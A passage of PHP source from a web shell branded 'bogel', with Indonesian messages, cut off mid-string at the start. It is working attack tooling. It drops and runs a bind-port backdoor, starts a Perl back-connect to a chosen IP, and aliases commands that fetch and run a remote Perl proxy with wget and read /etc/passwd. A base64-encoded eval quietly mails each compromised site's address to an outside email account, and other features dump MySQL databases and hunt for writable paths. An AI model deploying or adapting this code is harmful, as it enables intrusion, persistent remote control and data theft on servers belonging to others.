X3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
function cf($fname,$text) {
 $w_file=@fopen($fname,"w") or err();
 if($w_file) {
  @fputs($w_file,base64_decode($text));
  @fclose($w_file);
 }
}

function cfb($fname,$text) {
 $w_file=@fopen($fname,"w") or bberr();
 if($w_file) {
  @fputs($w_file,base64_decode($text));
  @fclose($w_file);
 }
}
function err() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't connect!"; }
function bberr() { $_POST['backcconnmsge']="<br><br><div class=fxerrmsg>Error:</div> Can't backdoor host!"; }

if (!empty($_POST['backconnectport']) && ($_POST['use']=="sleep")) {
 $ip = gethostbyname($_SERVER["HTTP_HOST"]);
 $por = $_POST['backconnectport'];
 if (is_writable(".")) {
  cfb("sleep",$backdoor);
  ex("chmod 755 sleep");
  $cmd = "./sleep $por";
  exec("$cmd > /dev/null &");
  $scan = myshellexec("ps -aux");
 } else {
  cfb("/tmp/sleep",$backdoor);
  ex("chmod 755 /tmp/sleep");
  $cmd = "./tmp/sleep $por";
  exec("$cmd > /dev/null &");
  $scan = myshellexec("ps -aux");
 }
 if (eregi("./sleep $por",$scan)) {
  $data = ("
<br>ngebind berhasil gan.");
 } else {
  $data = ("
<br>ngebind gagal gan :(");
 }
 $_POST['backcconnmsg']="To connect, use netcat! Usage: <b>'nc $ip $por'</b>.$data";
}

if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl")) {
 if (is_writable(".")) {
  cf("back",$back_connect_pl);
  $p2 = which("perl");
  $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
  if (file_exists("back")) { unlink("back"); }
 } else {
  cf("/tmp/back",$back_connect_pl);
  $p2 = which("perl");
  $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
  if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
 }
 $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
}

@ini_set("max_execution_time",0);
if (!function_exists("getmicrotime")) {
 function getmicrotime() {
  list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);
 }
}
error_reporting(5);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
define("starttime",getmicrotime());
$shell_data = "JHZpc2l0Y291bnQgPSAkSFRUUF9DT09LSUVfVkFSU1sidmlzaXRzIl07IGlmKCAkdmlzaXRjb3VudCA9PSAiIikgeyR2aXNpdGNvdW50ID0gMDsgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsgJHdlYiA9ICRfU0VSVkVSWyJIVFRQX0hPU1QiXTsgJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOyAkdGFyZ2V0ID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7ICRib2R5ID0gIkJvc3MsIHRoZXJlIHdhcyBhbiBpbmplY3RlZCB0YXJnZXQgb24gJHRhcmdldCBieSAkdmlzaXRvciI7IEBtYWlsKCJrdW5jdW5nYWphQHlhaG9vLmNvLmlkIiwiU2V0b3JhbiBUYXJnZXQgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiLCAiJGJvZHkiKTsgfSBlbHNlIHsgJHZpc2l0Y291bnQ7IH0gc2V0Y29va2llKCJ2aXNpdHMiLCR2aXNpdGNvdW50KTs="; eval(base64_decode($shell_data));
if (get_magic_quotes_gpc()) {
 if (!function_exists("strips")) {
  function strips(&$arr,$k="") {
   if (is_array($arr)) {
    foreach($arr as $k=>$v) {
     if (strtoupper($k) != "GLOBALS") { strips($arr["$k"]); }
    }
   } else {$arr = stripslashes($arr);}
  }
 }
 strips($GLOBALS);
}
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
$surl_autofill_include = TRUE; 
foreach($_REQUEST as $k=>$v) { if (!isset($$k)) {$$k = $v;} }
if ($surl_autofill_include) {
 $include = "&";
 foreach (explode("&",getenv("QUERY_STRING")) as $v) {
  $v = explode("=",$v);
  $name = urldecode($v[0]);
  $value = urldecode($v[1]);
  foreach (array("http://","https://","ssl://","ftp://","\") as $needle) {
   if (strpos($value,$needle) === 0) {
    $includestr .= urlencode($name)."=".urlencode($value)."&";
   }
  }
 }
}
if (empty($surl)) {
 $surl = "?".$includestr; 
}
$surl = htmlspecialchars($surl);

$ftypes = array(
  "html"=>array("html","htm","shtml"),
  "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  "exe"=>array("sh","install","bat","cmd"),
  "ini"=>array("ini","inf","conf"),
  "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  "sdb"=>array("sdb"),
  "phpsess"=>array("sess"),
  "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
$exeftypes = array(
  getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  "perl %f%" => array("pl","cgi")
);
$regxp_highlight = array(
  array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FFFF00>","</font>"),
  array("\.tgz$",1,"<font color=#C082FF>","</font>"),
  array("\.gz$",1,"<font color=#C082FF>","</font>"),
  array("\.tar$",1,"<font color=#C082FF>","</font>"),
  array("\.bz2$",1,"<font color=#C082FF>","</font>"),
  array("\.zip$",1,"<font color=#C082FF>","</font>"),
  array("\.rar$",1,"<font color=#C082FF>","</font>"),
  array("\.php$",1,"<font color=#00FF00>","</font>"),
  array("\.php3$",1,"<font color=#00FF00>","</font>"),
  array("\.php4$",1,"<font color=#00FF00>","</font>"),
  array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
  array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
  array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
  array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
  array("\.ico$",1,"<font color=#00FFFF>","</font>"),
  array("\.gif$",1,"<font color=#00FFFF>","</font>"),
  array("\.png$",1,"<font color=#00FFFF>","</font>"),
  array("\.htm$",1,"<font color=#00CCFF>","</font>"),
  array("\.html$",1,"<font color=#00CCFF>","</font>"),
  array("\.txt$",1,"<font color=#C0C0C0>","</font>")
);
if (!$win) {
 $cmdaliases = array(
  array("proses", "ps -x"),
  array("issue", "cat /etc/issue"),
	array("redhat", "cat /etc/redhat-release"),
  array("debian", "cat /etc/debian_version"),
	array("passwd", "cat /etc/passwd"),
  array("mkdir", "mkdir ..."),
  array("mmap", "cat /proc/sys/vm/mmap_min_addr"),
  array("777", "find -type d -perm 777"),
  array("cari php", "find |grep .php"),
  array("named", "ls -la /var/named"),
  array("killall perl", "killall -9 perl"),
  array("killall php", "killall -9 php"),
  array("proxy", "wget http://brb.is/.../proxy.txt;perl proxy.txt 1945"),
	array("port", "netstat -an | grep -i listen"),
 );
 
}
$quicklaunch1 = array(
			array('<font color=#00bb11>bogel</font>',$surl),
			array("<font color=#00bb11>backdoor</font>",$surl."x=sleep"),
			array("<font color=#00bb11>backconnect</font>",$surl."x=konak"),
			array("<font color=#00bb11>cPanel</font>",$surl."x=cP"),
			array("<font color=#00bb11>mysQL</font>",$surl."x=sql&d=%d"),
			array("<font color=#00bb11>Jumping</font>",$surl."x=jump"),
			array("<font color=#00bb11>PHP-Info</font>",$surl."x=security&d=%d"),  
			array("<font color=#00bb11>Proses</font>",$surl."x=processes&d=%d"),
			array("<font color=#00bb11>Scan</font>",$surl."x=sken"),
		  array("<font fcolor=#00bb11>Symlink</font>",$surl."x=sym&x=sym")
			
  ); 

$highlight_background = "#C0C0C0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";

@$f = $_REQUEST["f"];
@extract($_REQUEST["bogelcook"]);
@set_time_limit(0);
$tmp = array();
foreach ($host_allow as $k=>$v) { $tmp[] = str_replace("\*",".*",preg_quote($v)); }
$s = "!^(".implode("|",$tmp).")$!i";
if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
 exit("<a href=\"$sh_mainurl\">$sh_name</a>: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed");
}

if ($x != "img") {
 $lastdir = realpath(".");
 chdir($curdir);
 if ($selfwrite) {
  @ob_clean();
  bogel_getupdate($selfwrite,1);
  exit;
 }
 $sess_data = unserialize($_COOKIE["$sess_cookie"]);
 if (!is_array($sess_data)) {$sess_data = array();}
 if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
 if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
 if (!function_exists("cagetsource")) {
  function cagetsource($fn) {
   global $bogel_sourcesurl;
   $array = array(
    "bogel_bindport.pl" => "bogel_bindport_pl.txt",
    "bogel_bindport.c" => "bogel_bindport_c.txt",
    "bogel_backconn.pl" => "bogel_backconn_pl.txt",
    "bogel_backconn.c" => "bogel_backconn_c.txt",
    "bogel_datapipe.pl" => "bogel_datapipe_pl.txt",
    "bogel_datapipe.c" => "bogel_datapipe_c.txt",
   );
   $name = $array[$fn];
   if ($name) {return file_get_contents($bogel_sourcesurl.$name);}
   else {return FALSE;}
  }
 }
 if (!function_exists("ca_buff_prepare")) {
  function ca_buff_prepare() {
   global $sess_data;
   global $x;
   foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\",DIRECTORY_SEPARATOR,realpath($v));}
   foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\",DIRECTORY_SEPARATOR,realpath($v));}
   $sess_data["copy"] = array_unique($sess_data["copy"]);
   $sess_data["cut"] = array_unique($sess_data["cut"]);
   sort($sess_data["copy"]);
   sort($sess_data["cut"]);
   if ($x != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
   else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
  }
 }
 ca_buff_prepare();
 if (!function_exists("ca_sess_put")) {
  function ca_sess_put($data) {
   global $sess_cookie;
   global $sess_data;
   ca_buff_prepare();
   $sess_data = $data;
   $data = serialize($data);
   setcookie($sess_cookie,$data);
  }
 }
 foreach (array("sort","sql_sort") as $v) {
  if (!empty($_GET[$v])) {$$v = $_GET[$v];}
  if (!empty($_POST[$v])) {$$v = $_POST[$v];}
 }
 if ($sort_save) {
  if (!empty($sort)) {setcookie("sort",$sort);}
  if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
 }
 if (!function_exists("str2mini")) {
  function str2mini($content,$len) {
   if (strlen($content) > $len) {
    $len = ceil($len/2) - 2;
    return substr($content, 0,$len)."...".substr($content,-$len);
   } else {return $content;}
  }
 }
 if (!function_exists("view_size")) {
  function view_size($size) {
   if (!is_numeric($size)) { return FALSE; }
   else {
    if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
    elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
    elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
    else {$size = $size . " B";}
    return $size;
   }
  }
 }
 if (!function_exists("fs_copy_dir")) {
  function fs_copy_dir($d,$t) {
   $d = str_replace("\",DIRECTORY_SEPARATOR,$d);
   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
   $h = opendir($d);
   while (($o = readdir($h)) !== FALSE) {
    if (($o != ".") and ($o != "..")) {
     if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
     else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
     if (!$ret) {return $ret;}
    }
   }
   closedir($h);
   return TRUE;
  }
 }
 if (!function_exists("fs_copy_obj")) {
  function fs_copy_obj($d,$t) {
   $d = str_replace("\",DIRECTORY_SEPARATOR,$d);
   $t = str_replace("\",DIRECTORY_SEPARATOR,$t);
   if (!is_dir(dirname($t))) {mkdir(dirname($t));}
   if (is_dir($d)) {
    if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
    if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
    return fs_copy_dir($d,$t);
   }
   elseif (is_file($d)) { return copy($d,$t); }
   else { return FALSE; }
  }
 }
 if (!function_exists("fs_move_dir")) {
  function fs_move_dir($d,$t) {
   $h = opendir($d);
   if (!is_dir($t)) {mkdir($t);}
   while (($o = readdir($h)) !== FALSE) {
    if (($o != ".") and ($o != "..")) {
     $ret = TRUE;
     if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
     else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
     if (!$ret) {return $ret;}
    }
   }
   closedir($h);
   return TRUE;
  }
 }
 if (!function_exists("fs_move_obj")) {
  function fs_move_obj($d,$t) {
   $d = str_replace("\",DIRECTORY_SEPARATOR,$d);
   $t = str_replace("\",DIRECTORY_SEPARATOR,$t);
   if (is_dir($d)) {
    if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
    if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
    return fs_move_dir($d,$t);
   }
   elseif (is_file($d)) {
    if(copy($d,$t)) {return unlink($d);}
    else {unlink($t); return FALSE;}
   }
   else {return FALSE;}
  }
 }
 if (!function_exists("fs_rmdir")) {
  function fs_rmdir($d) {
   $h = opendir($d);
   while (($o = readdir($h)) !== FALSE) {
    if (($o != ".") and ($o != "..")) {
     if (!is_dir($d.$o)) {unlink($d.$o);}
     else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
    }
   }
   closedir($h);
   rmdir($d);
   return !is_dir($d);
  }
 }
 if (!function_exists("fs_rmobj")) {
  function fs_rmobj($o) {
   $o = str_replace("\",DIRECTORY_SEPARATOR,$o);
   if (is_dir($o)) {
    if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
    return fs_rmdir($o);
   }
   elseif (is_file($o)) {return unlink($o);}
   else {return FALSE;}
  }
 }
 if (!function_exists("tabsort")) {
  function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}
 }
 if (!function_exists("view_perms")) {
  function view_perms($mode) {
   if (($mode & 0xC000) === 0xC000) {$type = "s";}
   elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
   elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
   elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
   elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
   elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
   elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
   else {$type = "?";}
   $owner["read"] = ($mode & 00400)?"r":"-";
   $owner["write"] = ($mode & 00200)?"w":"-";
   $owner["execute"] = ($mode & 00100)?"x":"-";
   $group["read"] = ($mode & 00040)?"r":"-";
   $group["write"] = ($mode & 00020)?"w":"-";
   $group["execute"] = ($mode & 00010)?"x":"-";
   $world["read"] = ($mode & 00004)?"r":"-";
   $world["write"] = ($mode & 00002)? "w":"-";
   $world["execute"] = ($mode & 00001)?"x":"-";
   if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
   if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
   if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
   return $type.join("",$owner).join("",$group).join("",$world);
  }
 }
 if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
 if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
 if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
 if (!function_exists("parse_perms")) {
  function parse_perms($mode) {
   if (($mode & 0xC000) === 0xC000) {$t = "s";}
   elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
   elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
   elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
   elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
   elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
   elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
   else {$t = "?";}
   $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
   $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
   $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
   return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
  }
 }
 if (!function_exists("parsesort")) {
  function parsesort($sort) {
   $one = intval($sort);
   $second = substr($sort,-1);
   if ($second != "d") {$second = "a";}
   return array($one,$second);
  }
 }
 if (!function_exists("view_perms_color")) {
  function view_perms_color($o) {
   if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
   elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
   else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
  }
 }
 if (!function_exists("mysql_dump")) {
  function mysql_dump($set) {
   global $sh_ver;
   $sock = $set["sock"];
   $db = $set["db"];
   $print = $set["print"];
   $nl2br = $set["nl2br"];
   $file = $set["file"];
   $add_drop = $set["add_drop"];
   $tabs = $set["tabs"];
   $onlytabs = $set["onlytabs"];
   $ret = array();
   $ret["err"] = array();
   if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
   if (empty($db)) {$db = "db";}
   if (empty($print)) {$print = 0;}
   if (empty($nl2br)) {$nl2br = 0;}
   if (empty($add_drop)) {$add_drop = TRUE;}
   if (empty($file)) {
    $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
   }
   if (!is_array($tabs)) {$tabs = array();}
   if (empty($add_drop)) {$add_drop = TRUE;}
   if (sizeof($tabs) == 0) {
    $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
    if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
   }
   $out = "
   # Dumped by ".$sh_name."
   #
   # Host settings:
   # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
   # Date: ".date("d.m.Y H:i:s")."
   # DB: \"".$db."\"
   #---------------------------------------------------------";
   $c = count($onlytabs);
   foreach($tabs as $tab) {
    if ((in_array($tab,$onlytabs)) or (!$c)) {
     if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;
";}
     $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
     if (!$res) {$ret["err"][] = mysql_smarterror();}
     else {
      $row = mysql_fetch_row($res);
      $out .= $row["1"].";

";
      $res = mysql_query("SELECT * FROM `$tab`", $sock);
      if (mysql_num_rows($res) > 0) {
       while ($row = mysql_fetch_assoc($res)) {
        $keys = implode("`, `", array_keys($row));
        $values = array_values($row);
        foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
        $values = implode("', '", $values);
        $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');
";
        $out .= $sql;
       }
      }
     }
    }
   }
   $out .= "#---------------------------------------------------------------------------------

";
   if ($file) {
    $fp = fopen($file, "w");
    if (!$fp) {$ret["err"][] = 2;}
    else {
     fwrite ($fp, $out);
     fclose ($fp);
    }
   }
   if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
   return $out;
  }
 }
 if (!function_exists("mysql_buildwhere")) {
  function mysql_buildwhere($array,$sep=" and",$functs=array()) {
   if (!is_array($array)) {$array = array();}
   $result = "";
   foreach($array as $k=>$v) {
    $value = "";
    if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
    $value .= "'".addslashes($v)."'";
    if (!empty($functs[$k])) {$value .= ")";}
    $result .= "`".$k."` = ".$value.$sep;
   }
   $result = substr($result,0,strlen($result)-strlen($sep));
   return $result;
  }
 }
 if (!function_exists("mysql_fetch_all")) {
  function mysql_fetch_all($query,$sock) {
   if ($sock) {$result = mysql_query($query,$sock);}
   else {$result = mysql_query($query);}
   $array = array();
   while ($row = mysql_fetch_array($result)) {$array[] = $row;}
   mysql_free_result($result);
   return $array;
  }
 }
 if (!function_exists("mysql_smarterror")) {
  function mysql_smarterror($type,$sock) {
   if ($sock) {$error = mysql_error($sock);}
   else {$error = mysql_error();}
   $error = htmlspecialchars($error);
   return $error;
  }
 }
 if (!function_exists("mysql_query_form")) {
  function mysql_query_form() {
   global $submit,$sql_x,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
   if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
   if ($sql_query_result or (!$sql_confirm)) {$sql_x = $sql_goto;}
   if ((!$submit) or ($sql_x)) {
    echo "<table border=0><tr><td><form name=\"bogel_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=x value=sql><input type=hidden name=sql_x value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
    if ($tbl_struct) {
     echo "<td valign=\"top\"><b>Fields:</b><br>";
     foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.bogel_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
     echo "</td></tr></table>";
    }
   }
   if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
  }
 }
 if (!function_exists("mysql_create_db")) {
  function mysql_create_db($db,$sock="") {
   $sql = "CREATE DATABASE `".addslashes($db)."`;";
   if ($sock) {return mysql_query($sql,$sock);}
   else {return mysql_query($sql);}
  }
 }
 if (!function_exists("mysql_query_parse")) {
  function mysql_query_parse($query) {
   $query = trim($query);
   $arr = explode (" ",$query);
   $types = array(
    "SELECT"=>array(3,1),
    "SHOW"=>array(2,1),
    "DELETE"=>array(1),
    "DROP"=>array(1)
   );
   $result = array();
   $op = strtoupper($arr[0]);
   if (is_array($types[$op])) {
    $result["propertions"] = $types[$op];
    $result["query"] = $query;
    if ($types[$op] == 2) {
     foreach($arr as $k=>$v) {
      if (strtoupper($v) == "LIMIT") {
       $result["limit"] = $arr[$k+1];
       $result["limit"] = explode(",",$result["limit"]);
       if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
       unset($arr[$k],$arr[$k+1]);
      }
     }
    }
   }
   else {return FALSE;}
  }
 }
 if (!function_exists("cafsearch")) {
  function cafsearch($d) {
   global $found;
   global $found_d;
   global $found_f;
   global $search_i_f;
   global $search_i_d;
   global $a;
   if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
   $h = opendir($d);
   while (($f = readdir($h)) !== FALSE) {
    if($f != "." && $f != "..") {
     $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
     if (is_dir($d.$f)) {
      $search_i_d++;
      if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
      if (!is_link($d.$f)) {cafsearch($d.$f);}
     }
     else {
      $search_i_f++;
      if ($bool) {
       if (!empty($a["text"])) {
        $r = @file_get_contents($d.$f);
        if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
        if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
        if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
        else {$bool = strpos(" ".$r,$a["text"],1);}
        if ($a["text_not"]) {$bool = !$bool;}
        if ($bool) {$found[] = $d.$f; $found_f++;}
       }
       else {$found[] = $d.$f; $found_f++;}
      }
     }
    }
   }
   closedir($h);
  }
 }
 if ($x == "gofile") {
  if (is_dir($f)) { $x = "ls"; $d = $f; }
  else { $x = "f"; $d = dirname($f); $f = basename($f); }
 }
 @ob_start();
 @ob_implicit_flush(0);
 function onphpshutdown() {
  global $gzipencode,$ft;
  if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) {
   $v = @ob_get_contents();
   @ob_end_clean();
   @ob_start("ob_gzHandler");
   echo $v;
   @ob_end_flush();
  }
 }
 function bogelexit() {
  onphpshutdown();
  exit;
 }
 header("Expires: Mon, 12 Dec 2012 05:00:00 GMT");
 header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
 header("Cache-Control: no-store, no-cache, must-revalidate");
 header("Cache-Control: post-check=0, pre-check=0", FALSE);
 header("Pragma: no-cache");
 if (empty($tmpdir)) {
  $tmpdir = ini_get("upload_tmp_dir");
  if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
 }
 $tmpdir = realpath($tmpdir);
 $tmpdir = str_replace("\",DIRECTORY_SEPARATOR,$tmpdir);
 if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
 if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
 else {$tmpdir_logs = realpath($tmpdir_logs);}
 function showstat($stat) {
  if ($stat=="on") { return "<font color=#00FF00><b>ON</b></font>"; }
  else { return "<font color=#FF9900><b>OFF</b></font>"; }
 }
 function testSH() {
  if (ex('sh --help')) { return showstat("on"); }
  else { return showstat("off"); }
 }
  function testgcc() {
  if (ex('gcc --help')) { return showstat("on"); }
  else { return showstat("off"); }
 }
 function testperl() {
  if (ex('perl --help')) { return showstat("on"); }
  else { return showstat("off"); }
 }
 function testfetch() {
  if(ex('fetch --help')) { return showstat("on"); }
  else { return showstat("off"); }
 }
 function testwget() {
  if (ex('wget --help')) { return showstat("on"); }
  else { return showstat("off"); }
 }
 function testcurl() {
  if (function_exists('curl_version')) { return showstat("on"); }
  else { return showstat("off"); }
 }
 function testmysql() {
  if (function_exists('mysql_connect')) { return showstat("on"); }
  else { return showstat("off"); }
 }
 function showdisablefunctions() {
  if ($disablefunc=@ini_get("disable_functions")){ return "<font color=#FF9900><b>".$disablefunc."</b></font>"; }
  else { return "<font color=#00FF00><b>NONE</b></b></font>"; }
 }
 if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {
  $safemode = TRUE;
  $hsafemode = "<font color=#3366FF><b>SAFE MODE is ON ( FUCK )</b></font>";
 }
 else {
  $safemode = FALSE;
  $hsafemode = "<font color=#FF9900><b>SAFE MODE is OFF ( OKE )</b></font>";
 }
 $v = @ini_get("open_basedir");
 if ($v or strtolower($v) == "on") {
  $openbasedir = TRUE;
  $hopenbasedir = "<font color=red>".$v."</font>";
 }
 else {
  $openbasedir = FALSE;
  $hopenbasedir = "<font color=green>OFF ( OKE )</font>";
 }
 $sort = htmlspecialchars($sort);
 if (empty($sort)) {$sort = $sort_default;}
 $sort[1] = strtolower($sort[1]);
 $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
 if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
 $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."x=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
 @ini_set("highlight.bg",$highlight_bg);
 @ini_set("highlight.comment",$highlight_comment);
 @ini_set("highlight.default",$highlight_default);
 @ini_set("highlight.html",$highlight_html);
 @ini_set("highlight.keyword",$highlight_keyword);
 @ini_set("highlight.string",$highlight_string);
 if (!is_array($actbox)) { $actbox = array(); }
 $dspact = $x = htmlspecialchars($x);
 $disp_fullpath = $ls_arr = $notls = null;
 $ud = urlencode($d);
 $d = str_replace("\",DIRECTORY_SEPARATOR,$d);
 if (empty($d)) {$d = realpath(".");}
 elseif(realpath($d)) {$d = realpath($d);}
 $d = str_replace("\",DIRECTORY_SEPARATOR,$d);
 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 $d = str_replace("\","\",$d);
 $dispd = htmlspecialchars($d);
echo $html_start;
echo "<div class=barheader2><h3>$sh_name</h3><font color=lime>:: Masa Depan Mu Adalah Kematian ::</font></div><hr color=black>
";
